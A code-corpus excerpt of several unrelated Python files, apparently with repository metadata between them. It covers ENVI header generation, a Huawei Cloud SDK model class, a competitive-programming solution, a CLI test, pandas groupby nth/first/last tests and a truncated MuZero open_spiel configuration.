inDateHeaderFile = inDateFile + '.hdr'
inIncHeaderFile = inIncFile + '.hdr'
inMaskHeaderFile = inMaskFile + '.hdr'
inHeader = open(inHeaderFile, 'r')
inHHHeader = open(inHHHeaderFile, 'w')
inDateHeader = open(inDateHeaderFile,'w')
inIncHeader = open(inIncHeaderFile,'w')
inMaskHeader = open(inMaskHeaderFile,'w')
inULong = ''
inULat = ''
i = 1
for line in inHeader:
if i == 13:
inULat = line.strip()
elif i == 14:
inULon = line.strip()
i+=1
inULat = str(int(inULat) * 3600)
inULon = str(int(inULon) * 3600)
print(inULat)
print(inULon)
headerText = '''ENVI
description = {{
{} }}
samples = 1200
lines = 1200
bands = 1
header offset = 0
file type = ENVI Standard
data type = 12
interleave = bsq
sensor type = Unknown
byte order = 0
map info = {{ Geographic Lat/Lon, 1.0000, 1.0000, {}, {}, 32.0000000000e-01, 32.0000000000e-01, WGS-84, units=Seconds }}
wavelength units = Unknown
'''.format(inHeaderFile, inULon, inULat)
headerTextByte = '''ENVI
description = {{
{} }}
samples = 1200
lines = 1200
bands = 1
header offset = 0
file type = ENVI Standard
data type = 1
interleave = bsq
sensor type = Unknown
byte order = 0
map info = {{ Geographic Lat/Lon, 1.0000, 1.0000, {}, {}, 32.0000000000e-01, 32.0000000000e-01, WGS-84, units=Seconds}}
wavelength units = Unknown
''' .format(inHeaderFile, inULon, inULat)
inHHHeader.write(headerText)
inDateHeader.write(headerText)
inIncHeader.write(headerTextByte)
inMaskHeader.write(headerTextByte)
inHeader.close()
inHHHeader.close()
inDateHeader.close()
inIncHeader.close()
inMaskHeader.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create ENVI header files for GMW PALSAR Tiles')
parser.add_argument('-d', "--tiledirs", nargs='+',type=str, help="Input directory(s)")
args=parser.parse_args()
# Get absolute path
tile_dir_paths = [os.path.abspath(tile) for tile in args.tiledirs]
for tile_dir in tile_dir_paths:
if os.path.isdir(tile_dir):
try:
create_envi_headers(tile_dir)
print('Added headers for {}'.format(os.path.split(tile_dir)[-1]))
except Exception:
print('ERROR: No headers created for {}'.format(tile_dir), file=sys.stderr)
| 26.216
| 120
| 0.639609
|
10e462b6dd5ddb8328a2598ce44333f54990c567
| 3,714
|
py
|
Python
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
githubmilesma/huaweicloud-sdk-python-v3
|
9d9449ed68a609ca65f0aa50b5b2a1c28445bf03
|
[
"Apache-2.0"
] | 1
|
2021-04-16T07:59:28.000Z
|
2021-04-16T07:59:28.000Z
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
Lencof/huaweicloud-sdk-python-v3
|
d13dc4e2830a83e295be6e4de021999b3376e34e
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
Lencof/huaweicloud-sdk-python-v3
|
d13dc4e2830a83e295be6e4de021999b3376e34e
|
[
"Apache-2.0"
] | 1
|
2022-01-17T02:24:18.000Z
|
2022-01-17T02:24:18.000Z
|
# coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowOnlineMeetingDetailResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'conference_data': 'ConferenceInfo',
'data': 'PageParticipant'
}
attribute_map = {
'conference_data': 'conferenceData',
'data': 'data'
}
def __init__(self, conference_data=None, data=None):
"""ShowOnlineMeetingDetailResponse - a model defined in huaweicloud sdk"""
super().__init__()
self._conference_data = None
self._data = None
self.discriminator = None
if conference_data is not None:
self.conference_data = conference_data
if data is not None:
self.data = data
@property
def conference_data(self):
"""Gets the conference_data of this ShowOnlineMeetingDetailResponse.
:return: The conference_data of this ShowOnlineMeetingDetailResponse.
:rtype: ConferenceInfo
"""
return self._conference_data
@conference_data.setter
def conference_data(self, conference_data):
"""Sets the conference_data of this ShowOnlineMeetingDetailResponse.
:param conference_data: The conference_data of this ShowOnlineMeetingDetailResponse.
:type: ConferenceInfo
"""
self._conference_data = conference_data
@property
def data(self):
"""Gets the data of this ShowOnlineMeetingDetailResponse.
:return: The data of this ShowOnlineMeetingDetailResponse.
:rtype: PageParticipant
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this ShowOnlineMeetingDetailResponse.
:param data: The data of this ShowOnlineMeetingDetailResponse.
:type: PageParticipant
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowOnlineMeetingDetailResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.716418
| 92
| 0.585353
|
dee735e19b2d453b9c5faf07b665b5a11aa801c3
| 456
|
py
|
Python
|
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | 1
|
2019-08-21T00:49:34.000Z
|
2019-08-21T00:49:34.000Z
|
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
from sys import stdin
from itertools import accumulate
readline = stdin.readline
N = int(readline())
a = [[0] * (N + 1) for _ in range(2)]
for i in range(N):
C, P = map(int, readline().split())
a[C - 1][i + 1] = P
a = [list(accumulate(x)) for x in a]
Q = int(readline())
result = []
for _ in range(Q):
A, B = map(int, readline().split())
result.append('%d %d' % (a[0][B] - a[0][A - 1], a[1][B] - a[1][A - 1]))
print(*result, sep='\n')
| 21.714286
| 75
| 0.552632
|
a6d48ebc86eb92488fda6ed4d879cb254d1d5f78
| 249
|
py
|
Python
|
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
import click.testing
import pytest
from hypermodern_ben import console
@pytest.fixture
def runner():
return click.testing.CliRunner()
def test_main_succeeds(runner):
result = runner.invoke(console.main)
assert result.exit_code == 0
| 16.6
| 40
| 0.759036
|
8742135da59e5f509a934bd19e78cd4e6a23263e
| 22,749
|
py
|
Python
|
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
Index,
MultiIndex,
Series,
Timestamp,
isna,
)
import pandas._testing as tm
def test_first_last_nth(df):
# tests for first / last / nth
grouped = df.groupby("A")
first = grouped.first()
expected = df.loc[[1, 0], ["B", "C", "D"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(first, expected)
nth = grouped.nth(0)
tm.assert_frame_equal(nth, expected)
last = grouped.last()
expected = df.loc[[5, 7], ["B", "C", "D"]]
expected.index = Index(["bar", "foo"], name="A")
tm.assert_frame_equal(last, expected)
nth = grouped.nth(-1)
tm.assert_frame_equal(nth, expected)
nth = grouped.nth(1)
expected = df.loc[[2, 3], ["B", "C", "D"]].copy()
expected.index = Index(["foo", "bar"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(nth, expected)
# it works!
grouped["B"].first()
grouped["B"].last()
grouped["B"].nth(0)
df.loc[df["A"] == "foo", "B"] = np.nan
assert isna(grouped["B"].first()["foo"])
assert isna(grouped["B"].last()["foo"])
assert isna(grouped["B"].nth(0)["foo"])
# v0.14.0 whatsnew
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
result = g.first()
expected = df.iloc[[1, 2]].set_index("A")
tm.assert_frame_equal(result, expected)
expected = df.iloc[[1, 2]].set_index("A")
result = g.nth(0, dropna="any")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last"])
def test_first_last_with_na_object(method, nulls_fixture):
# https://github.com/pandas-dev/pandas/issues/32123
groups = DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 3, nulls_fixture]}).groupby("a")
result = getattr(groups, method)()
if method == "first":
values = [1, 3]
else:
values = [2, 3]
values = np.array(values, dtype=result["b"].dtype)
idx = Index([1, 2], name="a")
expected = DataFrame({"b": values}, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index", [0, -1])
def test_nth_with_na_object(index, nulls_fixture):
# https://github.com/pandas-dev/pandas/issues/32123
groups = DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 3, nulls_fixture]}).groupby("a")
result = groups.nth(index)
if index == 0:
values = [1, 3]
else:
values = [2, nulls_fixture]
values = np.array(values, dtype=result["b"].dtype)
idx = Index([1, 2], name="a")
expected = DataFrame({"b": values}, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last"])
def test_first_last_with_None(method):
# https://github.com/pandas-dev/pandas/issues/32800
# None should be preserved as object dtype
df = DataFrame.from_dict({"id": ["a"], "value": [None]})
groups = df.groupby("id", as_index=False)
result = getattr(groups, method)()
tm.assert_frame_equal(result, df)
@pytest.mark.parametrize("method", ["first", "last"])
@pytest.mark.parametrize(
"df, expected",
[
(
DataFrame({"id": "a", "value": [None, "foo", np.nan]}),
DataFrame({"value": ["foo"]}, index=Index(["a"], name="id")),
),
(
DataFrame({"id": "a", "value": [np.nan]}, dtype=object),
DataFrame({"value": [None]}, index=Index(["a"], name="id")),
),
],
)
def test_first_last_with_None_expanded(method, df, expected):
# GH 32800, 38286
result = getattr(df.groupby("id"), method)()
tm.assert_frame_equal(result, expected)
def test_first_last_nth_dtypes(df_mixed_floats):
df = df_mixed_floats.copy()
df["E"] = True
df["F"] = 1
# tests for first / last / nth
grouped = df.groupby("A")
first = grouped.first()
expected = df.loc[[1, 0], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(first, expected)
last = grouped.last()
expected = df.loc[[5, 7], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(last, expected)
nth = grouped.nth(1)
expected = df.loc[[3, 2], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(nth, expected)
# GH 2763, first/last shifting dtypes
idx = list(range(10))
idx.append(9)
s = Series(data=range(11), index=idx, name="IntCol")
assert s.dtype == "int64"
f = s.groupby(level=0).first()
assert f.dtype == "int64"
def test_first_last_nth_nan_dtype():
# GH 33591
df = DataFrame({"data": ["A"], "nans": Series([np.nan], dtype=object)})
grouped = df.groupby("data")
expected = df.set_index("data").nans
tm.assert_series_equal(grouped.nans.first(), expected)
tm.assert_series_equal(grouped.nans.last(), expected)
tm.assert_series_equal(grouped.nans.nth(-1), expected)
tm.assert_series_equal(grouped.nans.nth(0), expected)
def test_first_strings_timestamps():
# GH 11244
test = DataFrame(
{
Timestamp("2012-01-01 00:00:00"): ["a", "b"],
Timestamp("2012-01-02 00:00:00"): ["c", "d"],
"name": ["e", "e"],
"aaaa": ["f", "g"],
}
)
result = test.groupby("name").first()
expected = DataFrame(
[["a", "c", "f"]],
columns=Index([Timestamp("2012-01-01"), Timestamp("2012-01-02"), "aaaa"]),
index=Index(["e"], name="name"),
)
tm.assert_frame_equal(result, expected)
def test_nth():
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
tm.assert_frame_equal(g.nth(0), df.iloc[[0, 2]].set_index("A"))
tm.assert_frame_equal(g.nth(1), df.iloc[[1]].set_index("A"))
tm.assert_frame_equal(g.nth(2), df.loc[[]].set_index("A"))
tm.assert_frame_equal(g.nth(-1), df.iloc[[1, 2]].set_index("A"))
tm.assert_frame_equal(g.nth(-2), df.iloc[[0]].set_index("A"))
tm.assert_frame_equal(g.nth(-3), df.loc[[]].set_index("A"))
tm.assert_series_equal(g.B.nth(0), df.set_index("A").B.iloc[[0, 2]])
tm.assert_series_equal(g.B.nth(1), df.set_index("A").B.iloc[[1]])
tm.assert_frame_equal(g[["B"]].nth(0), df.loc[[0, 2], ["A", "B"]].set_index("A"))
exp = df.set_index("A")
tm.assert_frame_equal(g.nth(0, dropna="any"), exp.iloc[[1, 2]])
tm.assert_frame_equal(g.nth(-1, dropna="any"), exp.iloc[[1, 2]])
exp["B"] = np.nan
tm.assert_frame_equal(g.nth(7, dropna="any"), exp.iloc[[1, 2]])
tm.assert_frame_equal(g.nth(2, dropna="any"), exp.iloc[[1, 2]])
# out of bounds, regression from 0.13.1
# GH 6621
df = DataFrame(
{
"color": {0: "green", 1: "green", 2: "red", 3: "red", 4: "red"},
"food": {0: "ham", 1: "eggs", 2: "eggs", 3: "ham", 4: "pork"},
"two": {
0: 1.5456590000000001,
1: -0.070345000000000005,
2: -2.4004539999999999,
3: 0.46206000000000003,
4: 0.52350799999999997,
},
"one": {
0: 0.56573799999999996,
1: -0.9742360000000001,
2: 1.033801,
3: -0.78543499999999999,
4: 0.70422799999999997,
},
}
).set_index(["color", "food"])
result = df.groupby(level=0, as_index=False).nth(2)
expected = df.iloc[[-1]]
tm.assert_frame_equal(result, expected)
result = df.groupby(level=0, as_index=False).nth(3)
expected = df.loc[[]]
tm.assert_frame_equal(result, expected)
# GH 7559
# from the vbench
df = DataFrame(np.random.randint(1, 10, (100, 2)), dtype="int64")
s = df[1]
g = df[0]
expected = s.groupby(g).first()
expected2 = s.groupby(g).apply(lambda x: x.iloc[0])
tm.assert_series_equal(expected2, expected, check_names=False)
assert expected.name == 1
assert expected2.name == 1
# validate first
v = s[g == 1].iloc[0]
assert expected.iloc[0] == v
assert expected2.iloc[0] == v
# this is NOT the same as .first (as sorted is default!)
# as it keeps the order in the series (and not the group order)
# related GH 7287
expected = s.groupby(g, sort=False).first()
result = s.groupby(g, sort=False).nth(0, dropna="all")
tm.assert_series_equal(result, expected)
with pytest.raises(ValueError, match="For a DataFrame groupby"):
s.groupby(g, sort=False).nth(0, dropna=True)
# doc example
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
result = g.B.nth(0, dropna="all")
expected = g.B.first()
tm.assert_series_equal(result, expected)
# test multiple nth values
df = DataFrame([[1, np.nan], [1, 3], [1, 4], [5, 6], [5, 7]], columns=["A", "B"])
g = df.groupby("A")
tm.assert_frame_equal(g.nth(0), df.iloc[[0, 3]].set_index("A"))
tm.assert_frame_equal(g.nth([0]), df.iloc[[0, 3]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1]), df.iloc[[0, 1, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, -1]), df.iloc[[0, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1, 2]), df.iloc[[0, 1, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1, -1]), df.iloc[[0, 1, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([2]), df.iloc[[2]].set_index("A"))
tm.assert_frame_equal(g.nth([3, 4]), df.loc[[]].set_index("A"))
business_dates = pd.date_range(start="4/1/2014", end="6/30/2014", freq="B")
df = DataFrame(1, index=business_dates, columns=["a", "b"])
# get the first, fourth and last two business days for each month
key = [df.index.year, df.index.month]
result = df.groupby(key, as_index=False).nth([0, 3, -2, -1])
expected_dates = pd.to_datetime(
[
"2014/4/1",
"2014/4/4",
"2014/4/29",
"2014/4/30",
"2014/5/1",
"2014/5/6",
"2014/5/29",
"2014/5/30",
"2014/6/2",
"2014/6/5",
"2014/6/27",
"2014/6/30",
]
)
expected = DataFrame(1, columns=["a", "b"], index=expected_dates)
tm.assert_frame_equal(result, expected)
def test_nth_multi_index(three_group):
# PR 9090, related to issue 8979
# test nth on MultiIndex, should match .first()
grouped = three_group.groupby(["A", "B"])
result = grouped.nth(0)
expected = grouped.first()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data, expected_first, expected_last",
[
(
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
),
(
{
"id": ["A", "B", "A"],
"time": [
Timestamp("2012-01-01 13:00:00", tz="America/New_York"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
Timestamp("2012-03-01 12:00:00", tz="Europe/London"),
],
"foo": [1, 2, 3],
},
{
"id": ["A", "B"],
"time": [
Timestamp("2012-01-01 13:00:00", tz="America/New_York"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
],
"foo": [1, 2],
},
{
"id": ["A", "B"],
"time": [
Timestamp("2012-03-01 12:00:00", tz="Europe/London"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
],
"foo": [3, 2],
},
),
],
)
def test_first_last_tz(data, expected_first, expected_last):
# GH15884
# Test that the timezone is retained when calling first
# or last on groupby with as_index=False
df = DataFrame(data)
result = df.groupby("id", as_index=False).first()
expected = DataFrame(expected_first)
cols = ["id", "time", "foo"]
tm.assert_frame_equal(result[cols], expected[cols])
result = df.groupby("id", as_index=False)["time"].first()
tm.assert_frame_equal(result, expected[["id", "time"]])
result = df.groupby("id", as_index=False).last()
expected = DataFrame(expected_last)
cols = ["id", "time", "foo"]
tm.assert_frame_equal(result[cols], expected[cols])
result = df.groupby("id", as_index=False)["time"].last()
tm.assert_frame_equal(result, expected[["id", "time"]])
@pytest.mark.parametrize(
"method, ts, alpha",
[
["first", Timestamp("2013-01-01", tz="US/Eastern"), "a"],
["last", Timestamp("2013-01-02", tz="US/Eastern"), "b"],
],
)
def test_first_last_tz_multi_column(method, ts, alpha):
# GH 21603
category_string = Series(list("abc")).astype("category")
df = DataFrame(
{
"group": [1, 1, 2],
"category_string": category_string,
"datetimetz": pd.date_range("20130101", periods=3, tz="US/Eastern"),
}
)
result = getattr(df.groupby("group"), method)()
expected = DataFrame(
{
"category_string": pd.Categorical(
[alpha, "c"], dtype=category_string.dtype
),
"datetimetz": [ts, Timestamp("2013-01-03", tz="US/Eastern")],
},
index=Index([1, 2], name="group"),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"values",
[
pd.array([True, False], dtype="boolean"),
pd.array([1, 2], dtype="Int64"),
pd.to_datetime(["2020-01-01", "2020-02-01"]),
pd.to_timedelta([1, 2], unit="D"),
],
)
@pytest.mark.parametrize("function", ["first", "last", "min", "max"])
def test_first_last_extension_array_keeps_dtype(values, function):
# https://github.com/pandas-dev/pandas/issues/33071
# https://github.com/pandas-dev/pandas/issues/32194
df = DataFrame({"a": [1, 2], "b": values})
grouped = df.groupby("a")
idx = Index([1, 2], name="a")
expected_series = Series(values, name="b", index=idx)
expected_frame = DataFrame({"b": values}, index=idx)
result_series = getattr(grouped["b"], function)()
tm.assert_series_equal(result_series, expected_series)
result_frame = grouped.agg({"b": function})
tm.assert_frame_equal(result_frame, expected_frame)
def test_nth_multi_index_as_expected():
# PR 9090, related to issue 8979
# test nth on MultiIndex
three_group = DataFrame(
{
"A": [
"foo",
"foo",
"foo",
"foo",
"bar",
"bar",
"bar",
"bar",
"foo",
"foo",
"foo",
],
"B": [
"one",
"one",
"one",
"two",
"one",
"one",
"one",
"two",
"two",
"two",
"one",
],
"C": [
"dull",
"dull",
"shiny",
"dull",
"dull",
"shiny",
"shiny",
"dull",
"shiny",
"shiny",
"shiny",
],
}
)
grouped = three_group.groupby(["A", "B"])
result = grouped.nth(0)
expected = DataFrame(
{"C": ["dull", "dull", "dull", "dull"]},
index=MultiIndex.from_arrays(
[["bar", "bar", "foo", "foo"], ["one", "two", "one", "two"]],
names=["A", "B"],
),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"op, n, expected_rows",
[
("head", -1, []),
("head", 0, []),
("head", 1, [0, 2]),
("head", 7, [0, 1, 2]),
("tail", -1, []),
("tail", 0, []),
("tail", 1, [1, 2]),
("tail", 7, [0, 1, 2]),
],
)
@pytest.mark.parametrize("columns", [None, [], ["A"], ["B"], ["A", "B"]])
@pytest.mark.parametrize("as_index", [True, False])
def test_groupby_head_tail(op, n, expected_rows, columns, as_index):
df = DataFrame([[1, 2], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A", as_index=as_index)
expected = df.iloc[expected_rows]
if columns is not None:
g = g[columns]
expected = expected[columns]
result = getattr(g, op)(n)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"op, n, expected_cols",
[
("head", -1, []),
("head", 0, []),
("head", 1, [0, 2]),
("head", 7, [0, 1, 2]),
("tail", -1, []),
("tail", 0, []),
("tail", 1, [1, 2]),
("tail", 7, [0, 1, 2]),
],
)
def test_groupby_head_tail_axis_1(op, n, expected_cols):
# GH 9772
df = DataFrame(
[[1, 2, 3], [1, 4, 5], [2, 6, 7], [3, 8, 9]], columns=["A", "B", "C"]
)
g = df.groupby([0, 0, 1], axis=1)
expected = df.iloc[:, expected_cols]
result = getattr(g, op)(n)
tm.assert_frame_equal(result, expected)
def test_group_selection_cache():
# GH 12839 nth, head, and tail should return same result consistently
df = DataFrame([[1, 2], [1, 4], [5, 6]], columns=["A", "B"])
expected = df.iloc[[0, 2]].set_index("A")
g = df.groupby("A")
result1 = g.head(n=2)
result2 = g.nth(0)
tm.assert_frame_equal(result1, df)
tm.assert_frame_equal(result2, expected)
g = df.groupby("A")
result1 = g.tail(n=2)
result2 = g.nth(0)
tm.assert_frame_equal(result1, df)
tm.assert_frame_equal(result2, expected)
g = df.groupby("A")
result1 = g.nth(0)
result2 = g.head(n=2)
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, df)
g = df.groupby("A")
result1 = g.nth(0)
result2 = g.tail(n=2)
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, df)
def test_nth_empty():
# GH 16064
df = DataFrame(index=[0], columns=["a", "b", "c"])
result = df.groupby("a").nth(10)
expected = DataFrame(index=Index([], name="a"), columns=["b", "c"])
tm.assert_frame_equal(result, expected)
result = df.groupby(["a", "b"]).nth(10)
expected = DataFrame(
index=MultiIndex([[], []], [[], []], names=["a", "b"]), columns=["c"]
)
tm.assert_frame_equal(result, expected)
def test_nth_column_order():
# GH 20760
# Check that nth preserves column order
df = DataFrame(
[[1, "b", 100], [1, "a", 50], [1, "a", np.nan], [2, "c", 200], [2, "d", 150]],
columns=["A", "C", "B"],
)
result = df.groupby("A").nth(0)
expected = DataFrame(
[["b", 100.0], ["c", 200.0]], columns=["C", "B"], index=Index([1, 2], name="A")
)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").nth(-1, dropna="any")
expected = DataFrame(
[["a", 50.0], ["d", 150.0]], columns=["C", "B"], index=Index([1, 2], name="A")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("dropna", [None, "any", "all"])
def test_nth_nan_in_grouper(dropna):
# GH 26011
df = DataFrame(
[[np.nan, 0, 1], ["abc", 2, 3], [np.nan, 4, 5], ["def", 6, 7], [np.nan, 8, 9]],
columns=list("abc"),
)
result = df.groupby("a").nth(0, dropna=dropna)
expected = DataFrame(
[[2, 3], [6, 7]], columns=list("bc"), index=Index(["abc", "def"], name="a")
)
tm.assert_frame_equal(result, expected)
def test_first_categorical_and_datetime_data_nat():
# GH 20520
df = DataFrame(
{
"group": ["first", "first", "second", "third", "third"],
"time": 5 * [np.datetime64("NaT")],
"categories": Series(["a", "b", "c", "a", "b"], dtype="category"),
}
)
result = df.groupby("group").first()
expected = DataFrame(
{
"time": 3 * [np.datetime64("NaT")],
"categories": Series(["a", "c", "a"]).astype(
pd.CategoricalDtype(["a", "b", "c"])
),
}
)
expected.index = Index(["first", "second", "third"], name="group")
tm.assert_frame_equal(result, expected)
def test_first_multi_key_groupbby_categorical():
# GH 22512
df = DataFrame(
{
"A": [1, 1, 1, 2, 2],
"B": [100, 100, 200, 100, 100],
"C": ["apple", "orange", "mango", "mango", "orange"],
"D": ["jupiter", "mercury", "mars", "venus", "venus"],
}
)
df = df.astype({"D": "category"})
result = df.groupby(by=["A", "B"]).first()
expected = DataFrame(
{
"C": ["apple", "mango", "mango"],
"D": Series(["jupiter", "mars", "venus"]).astype(
pd.CategoricalDtype(["jupiter", "mars", "mercury", "venus"])
),
}
)
expected.index = MultiIndex.from_tuples(
[(1, 100), (1, 200), (2, 100)], names=["A", "B"]
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last", "nth"])
def test_groupby_last_first_nth_with_none(method, nulls_fixture):
# GH29645
expected = Series(["y"])
data = Series(
[nulls_fixture, nulls_fixture, nulls_fixture, "y", nulls_fixture],
index=[0, 0, 0, 0, 0],
).groupby(level=0)
if method == "nth":
result = getattr(data, method)(3)
else:
result = getattr(data, method)()
tm.assert_series_equal(result, expected)
def test_groupby_nth_with_column_axis():
# GH43926
df = DataFrame(
[
[4, 5, 6],
[8, 8, 7],
],
index=["z", "y"],
columns=["C", "B", "A"],
)
result = df.groupby(df.iloc[1], axis=1).nth(0)
expected = DataFrame(
[
[6, 4],
[7, 8],
],
index=["z", "y"],
columns=[7, 8],
)
expected.columns.name = "y"
tm.assert_frame_equal(result, expected)
| 31.077869
| 87
| 0.527364
|
e603827ea9d27820295884c357c0cdceb0ff59d7
| 11,849
|
py
|
Python
|
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
games/spiel.py
|
Wu-Chenyang/PO-MuZero
|
c2b6f87c01a195d6f1cbe297e826974120bba3d3
|
[
"MIT"
] | null | null | null |
import datetime
import os
import numpy
import torch
from .abstract_game import AbstractGame
# This is a Game wrapper for open_spiel games. It allows you to run any game in the open_spiel library.
try:
import pyspiel
except ImportError:
import sys
sys.exit("You need to install open_spiel by running pip install open_spiel. For a full documentation, see: https://github.com/deepmind/open_spiel/blob/master/docs/install.md")
# The game you want to run. See https://github.com/deepmind/open_spiel/blob/master/docs/games.md for a list of games
game = pyspiel.load_game("tic_tac_toe")
class MuZeroConfig:
def __init__(self):
# More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization
self.game = game
self.seed = 0 # Seed for numpy, torch and the game
self.max_num_gpus = None # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use every GPUs available
### Game
self.observation_shape = tuple(self.game.observation_tensor_shape()) # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)
self.action_space = list(range(self.game.policy_tensor_shape()[0])) # Fixed list of all possible actions. You should only edit the length
self.players = list(range(self.game.num_players())) # List of players. You should only edit the length
self.stacked_observations = 0 # Number of previous observations and previous actions to add to the current observation
self.simultaneous = False # The agents will execute actions simultaneously.
# Evaluate
self.muzero_player = 0 # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)
self.opponent = "self" # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, "random" or "expert" if implemented in the Game class
### Self-Play
self.num_workers = 1 # Number of simultaneous threads/workers self-playing to feed the replay buffer
self.selfplay_on_gpu = False
self.max_moves = self.game.max_game_length() # Maximum number of moves if game is not finished before
self.num_simulations = 25 # Number of future moves self-simulated
self.discount = 0.1 # Chronological discount of the reward
self.temperature_threshold = None # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time
# Root prior exploration noise
self.root_dirichlet_alpha = 0.1
